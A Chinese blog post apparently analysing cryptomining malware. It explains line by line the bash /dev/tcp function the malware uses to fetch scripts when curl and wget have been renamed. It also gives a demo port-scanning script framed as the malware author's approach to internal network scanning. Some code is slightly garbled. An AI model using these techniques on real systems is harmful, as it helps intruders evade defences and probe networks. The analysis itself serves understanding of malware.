linux在没有curl和wget的情况下如何用shell实现下载功能

ahcoder 2025-03-26 09:17 16 浏览

最近在分析挖矿木马，发现挖矿木马在入侵后都会对系统自带的部分命令进行替换或劫持。最常见的就是将wget和curl命令重命名。在多个挖矿木马同时竞争的情况下，没有wget和curl该如何远程下载挖矿脚本呢？

直接看挖矿脚本是如何实现的。这里面涵盖了很多知识点，非常值得学习！

function DOWNLOAD() {
 read proto server path <<< "${1//"/"/ }"
 DOC=/${path// //}
 HOST=${server//:*}
 PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
 exec 3<>/dev/tcp/${HOST}/$PORT
 echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
while IFS= read -r line ; do
[[ "$line" ==

\r' ]] && break
 done <&3
 nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
 printf "%s$nul" "$x"
 done <&3 exec 3>&-
}

为更好分析是如何实现下载的，我们用bash -x来执行脚本打印中间过程。这段shell脚本只是把远程服务器上的文件内容输出到屏幕，如果要写入文件可以用重定向符追加到文件。

用read读取第一个参数url解析赋值得到path，server和port。

然后判断host和port的值是否相等。因为请求的url中可能不会带有端口号，此时匹配值就是相同的，该条件为真时就默认port为80端口。

文章目录

有人会提问说：要按照上面的代码要请求是https也默认80端口不就报错了吗？
为什么我上图中url参数用的https为何也请求成功了？
[[ x”${HOST}” == x”${PORT}” ]] 为什么这个判断前面都要加个x呢？
在Bash Shell中打开或关闭TCP / UDP套接字

有人会提问说：要按照上面的代码要请求是https也默认80端口不就报错了吗？

是的，这样只能实现最简单的http的请求，https涉及到证书密钥的传输，实现起来过于复杂。在极端场景下，能实现http下载已经可以了。

为什么我上图中url参数用的https为何也请求成功了？

因为我博客同时允许了http和https共存，实际上面请求还是用的http协议（我也是后面才发现的），如果没有允许http协议这里就会报错。

[[ x”${HOST}” == x”${PORT}” ]] 为什么这个判断前面都要加个x呢？

示例：
if [ “x${var}” == “x” ]
if [ x”$DPVS_TYPE” == x”SNAT” ]

目的：防止出现语法错误。

因为如果不写x，只用 if [ “${var} == “0” ]来判断${var}的值;
当${var}为空或未设置时，语句被解释为 if [ == “0” ]，出现语法错误。
加上x后，当${var}为空或未设置时，解释为if [ “x” == “x” ] ，依然正确。

所以：if [ “x${var}” == “x” ] 整句的意思是判断${var}是否为空。

解释下 exec 3<>/dev/tcp/${HOST}/$PORT 的含义。

看到/dev/tcp/${HOST}/$PORT的第一反应就是想到用bash反弹shell，不知道做安全的小伙伴是不是这种感觉。

在Bash Shell中打开或关闭TCP / UDP套接字

可以使用bash shell 中的以下语法打开TCP / UDP套接字。

$ exec ${file-descriptor} </dev/${protocol}/${host}/${port}

“文件描述符”是与每个套接字相关联的唯一的非负整数。文件描述符0,1和2分别保留给stdin，stdout和stderr。因此必须指定3或更高（以未使用者为准）作为文件描述符。

“<>”意味着套接字对于读写都是打开的，根据需要，可以打开只读（<）或只写（>）的套接字。“协议”字段可以是tcp或udp。

打开后，可以使用以下语法关闭读/写套接字。

$ exec ${file-descriptor} <＆ – //关闭输入连接
$ exec ${file-descriptor}>＆ – //关闭输出连接

其中echo使用了e n两个参数：
-e：开启转义
-n：默认echo会在最后输出最后加上一个\n换行，使用了该参数后就不会自动加上换行

因为在标准http协议中header和body是用\r\n\r\n分隔开的。

while IFS= read -r line ; do

[[ "$line" ==

\r' ]] && break

done <&3

-r 屏蔽\，如果没有该选项，则\作为一个转义字符，有的话 \就是个正常的字符了。

这里就是按行读取header部分，匹配到\r就停止读取了。

shell – IFS分隔符，IFS是internal field separator的缩写，shell的特殊环境变量。ksh根据IFS存储的值，可以是空格、tab、换行符或者其他自定义符号，来解析输入和输出的变量值。

 nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
 printf "%s$nul" "$x"
 done <&3 exec 3>&-
read -d 后面跟一个标志符，其实只有其后的第一个字符有用，作为结束的标志。

这里就是读取body部分。exec 3>&- 关闭输出fd3。

短短几行shell代码就实现了linux的下载功能。并且这里下载需要将结果追加到文件。

下载文件并解压成功

举一反三：

既然在没有curl和wget的情况下用shell实现了下载，那么同样可以借此实现其他功能。

思考一个场景，如果我是挖矿木马的开发者，在内网的情况下没法下载扫描工具的源码（如masscan）进行编译时候可以用同样的方式来扫描内网呢？

下面是我的思路，一个简单的demo：

#!/bin/bash
host=$1
port_first=1
port_last=65535
for ((port=$port_first; port<=$port_last; port do echo>/dev/tcp/$host/$port) >/dev/null 2>&1 && echo "$port open"
done

linux系统下载

上一篇：Linux 下安装最新版 MySQL（linux安装mysql数据库）
下一篇：迅雷下载 Linux 版已上架统信 UOS 商店

linux在没有curl和wget的情况下如何用shell实现下载功能

有人会提问说：要按照上面的代码要请求是https也默认80端口不就报错了吗？

为什么我上图中url参数用的https为何也请求成功了？

[[ x”${HOST}” == x”${PORT}” ]] 为什么这个判断前面都要加个x呢？

在Bash Shell中打开或关闭TCP / UDP套接字

相关推荐

为什么有人认为Linux不如macOS?

linux系统实用篇-8、系统配置与优化

Linux中如何启用root用户

如何远程执行Linux命令和脚本?大技霸来教你

Windows如何远程linux(桌面版)

6款Linux常用远程连接工具，你最中意哪一款?

如何使用 Linux find 命令查找文件?

Rackspace的所有平台将支持Ubuntu Linux

这次答应我，一举拿下 I/O 多路复用

Linux新手入门系列:Linux远程访问